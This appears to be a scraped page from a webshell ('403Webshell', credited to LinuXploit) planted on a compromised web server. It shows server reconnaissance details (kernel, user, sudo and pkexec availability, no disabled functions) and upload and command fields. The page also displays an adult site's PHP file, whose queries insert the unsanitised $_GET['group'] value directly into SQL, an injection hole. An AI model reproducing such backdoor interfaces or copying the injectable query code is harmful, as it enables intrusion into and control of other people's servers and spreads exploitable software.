403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/honeyschool.com/public_html/t2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/honeyschool.com/public_html/t2/models.php
<?php include "header-2.php"; ?>

<div class='text'>
	You want access to over <strong>1,000 hot and horny honeys</strong> and now's your chance to have them all instantly!  With an easy to use <strong>honey index</strong>, <strong>zip downloads</strong> and boner inducing <strong>High Definition Videos</strong> you'll find the honey of your dreams in minutes.
</div>

<div class='modelnav-top'>
<a href='models.php?group=A'>A</a> - <a href='models.php?group=B'>B</a> - <a href='models.php?group=C'>C</a> - <a href='models.php?group=D'>D</a> - <a href='models.php?group=E'>E</a> - <a href='models.php?group=F'>F</a> - <a href='models.php?group=G'>G</a> - <a href='models.php?group=H'>H</a> - <a href='models.php?group=I'>I</a> - <a href='models.php?group=J'>J</a> - <a href='models.php?group=K'>K</a> - <a href='models.php?group=L'>L</a> - <a href='models.php?group=M'>M</a> - <a href='models.php?group=N'>N</a> - <a href='models.php?group=O'>O</a> - <a href='models.php?group=P'>P</a> - Q - <a href='models.php?group=R'>R</a> - <a href='models.php?group=S'>S</a> - <a href='models.php?group=T'>T</a> - U - <a href='models.php?group=V'>V</a> - <a href='models.php?group=W'>W</a> - X - <a href='models.php?group=Y'>Y</a> - <a href='models.php?group=Z'>Z</a>
</div>

<div class='modelnav-mid'>
<?php // honeys.php

	include "setup.php";

	$z = TYPE ;
	$keys = explode(';', $z);
	$word = " and (word LIKE '%".$keys[0]."%'";
	for($x=1; $x < count($keys); $x++) {
		$word .= " OR word LIKE '%".$keys[$x]."%'";
	}
	$word .= ")";

	$link = dbConnect($databaseName);
	$timestamp = mktime(0,0,0);

	$y = EXCLUDE;
	$keys = explode(';', $y);
	$exclude = " AND (link NOT LIKE '%".$keys[0]."%'";
	for($x=1; $x < count($keys); $x++) {
		$exclude .= " AND link NOT LIKE '%".$keys[$x]."%'";
	}
	$exclude .= ")";

	$timestamp = mktime(0,0,0);
	$cols = 9;
	$rows = 20;
	$limit = $cols * $rows;
	$start = 0;

	$q1 = q("SELECT girl_id FROM models WHERE show = 1 AND unix_day <= '$timestamp' $word $exclude $filter", $link);
	$totalRecs = nr($q1);

	$group = $_GET['group'];
	if(isset($group) && $group != 'top') {
		$filter = " AND preview = 1 AND models.name LIKE '$group%'";
		$query = q("SELECT girl_id, name, image, link, hot, members_rank FROM models WHERE unix_day <= '$timestamp' $word $exclude $filter ORDER BY name, name LIMIT $start, $limit", $link);
	} else {
		$filter = " AND (preview = 1) AND models.name LIKE '$group%'";
		$query = q("SELECT girl_id, name, image, link, hot, members_rank FROM models WHERE unix_day <= '$timestamp' $word $exclude $filter ORDER BY hot DESC, name LIMIT $start, $limit", $link);
	}

	$rowsReturned = nr($query);
	$sRows = ceil($rowsReturned / $cols) * 20;

echo "<table align='center' cellspacing='2' cellpadding='2' border='0'>\n";

$column = 1;
$item = 0;
$factcount = 0;
while($model = f($query)) {
	$girlname = str_replace('_', ' ', $model->link);
	$girlname = str_replace('-', ' ', $model->link);

	$sets = f(q("SELECT COUNT(*) AS nmbr FROM sets WHERE dates<=$timestamp $exclude $type AND (girlname LIKE '".$girlname."%' OR girlname LIKE '%".$girlname."')", $link));
	$item++;
	if($column == 1) {
		echo	"<tr>\n";
	}
	echo	"<td class='models' align='center' valign='top'>\n";
	echo	"<img class='babe' src='/thumbs/90/$model->image' alt='$model->name - $model->hot' border='1' width='90' height='120'><br />\n";
	echo	"$model->name</td>\n";

	$column++;
	if($column > $cols) {
		echo "</tr>\n";
		$column = 1;
	}
//	if (($item % ($cols * 4)) == 0 AND $item < 80) {
//		echo	"<tr><td align='center' colspan='$cols'><a href='http://nscash.com/mpa2/signup/signup.php?s=7'><img src='images/accessall.gif' width='834' height='72' alt='Click Here To Join Now!' border='0'></a></td></tr>\n";
//	}
} // while Models

echo	"</table>\n";

//if ($item < 24) {
//	echo	"<a href='http://nscash.com/mpa2/signup/signup.php?s=7'><img src='images/accessall.gif' width='834' height='72' alt='Click Here To Join Now!' border='0'></a>\n";
//  } elseif (($item % 24) > 6) {
//	echo	"<a href='http://nscash.com/mpa2/signup/signup.php?s=7'><img src='images/accessall.gif' width='834' height='72' alt='Click Here To Join Now!' border='0'></a></a>\n";
//}
?>
<div class='modelnav-top'>
<a href='models.php?group=A'>A</a> - <a href='models.php?group=B'>B</a> - <a href='models.php?group=C'>C</a> - <a href='models.php?group=D'>D</a> - <a href='models.php?group=E'>E</a> - <a href='models.php?group=F'>F</a> - <a href='models.php?group=G'>G</a> - <a href='models.php?group=H'>H</a> - <a href='models.php?group=I'>I</a> - <a href='models.php?group=J'>J</a> - <a href='models.php?group=K'>K</a> - <a href='models.php?group=L'>L</a> - <a href='models.php?group=M'>M</a> - <a href='models.php?group=N'>N</a> - <a href='models.php?group=O'>O</a> - <a href='models.php?group=P'>P</a> - Q - <a href='models.php?group=R'>R</a> - <a href='models.php?group=S'>S</a> - <a href='models.php?group=T'>T</a> - U - <a href='models.php?group=V'>V</a> - <a href='models.php?group=W'>W</a> - X - <a href='models.php?group=Y'>Y</a> - <a href='models.php?group=Z'>Z</a>
</div>

</div>

<?php include "footer.php"; ?>

Youez - 2016 - github.com/yon3zu
LinuXploit